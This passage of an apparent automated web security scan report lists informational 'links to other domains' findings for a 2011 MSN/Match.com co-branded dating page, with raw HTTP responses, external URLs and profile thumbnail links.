<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now »" class="btnSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now »" class="btnKeywordSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<a href="/en-us/partner/msn/20400_5.html" target="_blank"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif" alt="Click Here »" width="129" height="27" border="0" /></a>
...[SNIP]...
<input id="lookingForZip" type="text" name="zip" maxlength="10"/> <img src="http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif" class="zipKwdSubmit" width="128" height="27" /></div>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg" alt="Jennie7788" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Jennie7788&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg" alt="Jennie7788" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/76/24/69817624R.jpeg" alt="cambridge_k" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=cambridge_k&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/76/24/69817624R.jpeg" alt="cambridge_k" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/48/81/78874881A.jpeg" alt="RebeccaWhistler" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=RebeccaWhistler&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/48/81/78874881A.jpeg" alt="RebeccaWhistler" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/71/54295771D.jpeg" alt="emcjdccjc" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=emcjdccjc&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/71/54295771D.jpeg" alt="emcjdccjc" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=423bergh&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg" alt="coollowjane" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=coollowjane&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg" alt="coollowjane" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/70/27/97217027B.jpeg" alt="rachmarie16" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=rachmarie16&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/70/27/97217027B.jpeg" alt="rachmarie16" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Olive2882&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=cat5518&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=memphis38104&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/67/15/93936715M.jpeg" alt="holidayinspain3" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=holidayinspain3&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/67/15/93936715M.jpeg" alt="holidayinspain3" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg" alt="natalieD2881" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=natalieD2881&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg" alt="natalieD2881" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=TheOneAndOnly_1_&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=mar_kl15&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=forever2911&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/94/80911394A.jpeg" alt="jfm53" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=jfm53&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/94/80911394A.jpeg" alt="jfm53" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/57/62661357E.jpeg" alt="MK2324" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=MK2324&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/57/62661357E.jpeg" alt="MK2324" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/97/35/96829735A.jpeg" alt="liz6919" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=liz6919&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/97/35/96829735A.jpeg" alt="liz6919" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg" alt="beach_sports77" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=beach_sports77&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg" alt="beach_sports77" border="0" /></a>
...[SNIP]...
<a href="/qsearch/qsearchdl.aspx?lage=20&uage=30&bd=1&bd=2&bd=3&ex=2&ex=3&ex=4&r2s=1&cpp=floatingreg/msn/default.html" target="_top"><img src="http://images.match.com/s.gif" width="80" height="100" alt="View More Profiles" /></a>
...[SNIP]...
<div id="pnlBtm"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btm.png" width="973" height="8" /></div>
...[SNIP]...

22.62. http://dating.redacted/cp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/cp.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dating.redacted/cp.aspx?cpp=/en-us/partner/msn/38028.html&trackingid=526133&bannerid=722762&gc=1&tr=2&keyword=outdoors&gt1=26000

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/en-us/partner/msn/38028.css
http://cp.match.com/en-us/partner/msn/images/38028_btm.png
http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif
http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif
http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif
http://cp.match.com/scripts/jquery.pngFix.js
http://download.live.com/?sku=messenger
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://images.match.com/s.gif
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://sthumbnails.match.com/sthumbnails/08/23/5720823U.jpeg
http://sthumbnails.match.com/sthumbnails/11/81/98001181B.jpeg
http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg
http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg
http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg
http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg
http://sthumbnails.match.com/sthumbnails/35/22/98643522B.jpeg
http://sthumbnails.match.com/sthumbnails/54/69/66035469X.jpeg
http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg
http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg
http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg
http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg
http://sthumbnails.match.com/sthumbnails/72/27/92127227B.jpeg
http://sthumbnails.match.com/sthumbnails/75/64/94867564A.jpeg
http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg
http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg
http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg
http://sthumbnails.match.com/sthumbnails/87/19/94318719D.jpeg
http://sthumbnails.match.com/sthumbnails/90/08/36679008A.jpeg
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:44:21 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/30/2011; expires=Mon, 30-Jan-2012 16:44:19 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/30/2011; domain=match.com; expires=Mon, 30-Jan-2012 16:44:19 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/30/2011&UMID=2cd4439a-0973-4f98-88d3-792ed5021042; expires=Mon, 30-Jan-2012 16:44:19 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=2c27fe31-53fc-4ee6-8800-d527196a9fc1&THEME=80; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
</style>
<link href="http://cp.match.com/en-us/partner/msn/38028.css" rel="stylesheet" type="text/css" />
<title>
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now »" class="btnSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now »" class="btnKeywordSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<a href="/en-us/partner/msn/20400_5.html" target="_blank"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif" alt="Click Here »" width="129" height="27" border="0" /></a>
...[SNIP]...
<input id="lookingForZip" type="text" name="zip" maxlength="10"/> <img src="http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif" class="zipKwdSubmit" width="128" height="27" /></div>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg" alt="Jennie7788" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Jennie7788&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg" alt="Jennie7788" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/54/69/66035469X.jpeg" alt="SoccerGirl3381" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=SoccerGirl3381&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/54/69/66035469X.jpeg" alt="SoccerGirl3381" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=423bergh&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg" alt="coollowjane" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=coollowjane&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg" alt="coollowjane" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Olive2882&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=cat5518&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=memphis38104&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/11/81/98001181B.jpeg" alt="Luvinlife44574" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Luvinlife44574&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/11/81/98001181B.jpeg" alt="Luvinlife44574" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=TheOneAndOnly_1_&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=mar_kl15&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg" alt="natalieD2881" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=natalieD2881&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg" alt="natalieD2881" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=forever2911&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/90/08/36679008A.jpeg" alt="Delightfulday" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Delightfulday&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/90/08/36679008A.jpeg" alt="Delightfulday" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg" alt="beach_sports77" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=beach_sports77&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg" alt="beach_sports77" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/08/23/5720823U.jpeg" alt="PrincessGirl4u" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=PrincessGirl4u&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/08/23/5720823U.jpeg" alt="PrincessGirl4u" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/75/64/94867564A.jpeg" alt="sdamelia2475" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=sdamelia2475&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/75/64/94867564A.jpeg" alt="sdamelia2475" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/35/22/98643522B.jpeg" alt="dggator81" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=dggator81&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/35/22/98643522B.jpeg" alt="dggator81" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/72/27/92127227B.jpeg" alt="mdonohoe" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=mdonohoe&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/72/27/92127227B.jpeg" alt="mdonohoe" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/87/19/94318719D.jpeg" alt="leorose821" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=leorose821&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/87/19/94318719D.jpeg" alt="leorose821" border="0" /></a>
...[SNIP]...
<a href="/qsearch/qsearchdl.aspx?lage=20&uage=30&bd=1&bd=2&bd=3&ex=2&ex=3&ex=4&r2s=1&cpp=floatingreg/msn/default.html" target="_top"><img src="http://images.match.com/s.gif" width="80" height="100" alt="View More Profiles" /></a>
...[SNIP]...
<div id="pnlBtm"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btm.png" width="973" height="8" /></div>
...[SNIP]...

22.63. http://dating.redacted/en-us/partner/msn/38028.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/en-us/partner/msn/38028.html

Issue detail

The page was loaded from a URL containing a query string:

http://dating.redacted/en-us/partner/msn/38028.html?trackingid=526133&bannerid=673612&gc=1&tr=2&keyword=football&gt1=26000

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/en-us/partner/msn/38028.css
http://cp.match.com/en-us/partner/msn/images/38028_btm.png
http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif
http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif
http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif
http://cp.match.com/scripts/jquery.pngFix.js
http://download.live.com/?sku=messenger
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://images.match.com/s.gif
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://sthumbnails.match.com/sthumbnails/01/36/95520136A.jpeg
http://sthumbnails.match.com/sthumbnails/02/87/62120287G.jpeg
http://sthumbnails.match.com/sthumbnails/07/19/15050719A.jpeg
http://sthumbnails.match.com/sthumbnails/11/67/55471167S.jpeg
http://sthumbnails.match.com/sthumbnails/12/09/54891209Q.jpeg
http://sthumbnails.match.com/sthumbnails/13/69/97171369A.jpeg
http://sthumbnails.match.com/sthumbnails/15/14/94321514G.jpeg
http://sthumbnails.match.com/sthumbnails/16/75/57511675A.jpeg
http://sthumbnails.match.com/sthumbnails/17/53/85161753I.jpeg
http://sthumbnails.match.com/sthumbnails/18/76/65071876H.jpeg
http://sthumbnails.match.com/sthumbnails/23/44/79962344A.jpeg
http://sthumbnails.match.com/sthumbnails/35/74/71163574I.jpeg
http://sthumbnails.match.com/sthumbnails/37/72/92313772M.jpeg
http://sthumbnails.match.com/sthumbnails/49/92/57654992W.jpeg
http://sthumbnails.match.com/sthumbnails/52/68/90945268N.jpeg
http://sthumbnails.match.com/sthumbnails/56/02/90005602Q.jpeg
http://sthumbnails.match.com/sthumbnails/57/91/74735791A.jpeg
http://sthumbnails.match.com/sthumbnails/75/22/36387522W.jpeg
http://sthumbnails.match.com/sthumbnails/99/80/80129980F.jpeg
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /en-us/partner/msn/38028.html?trackingid=526133&bannerid=673612&gc=1&tr=2&keyword=football&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:46:03 GMT
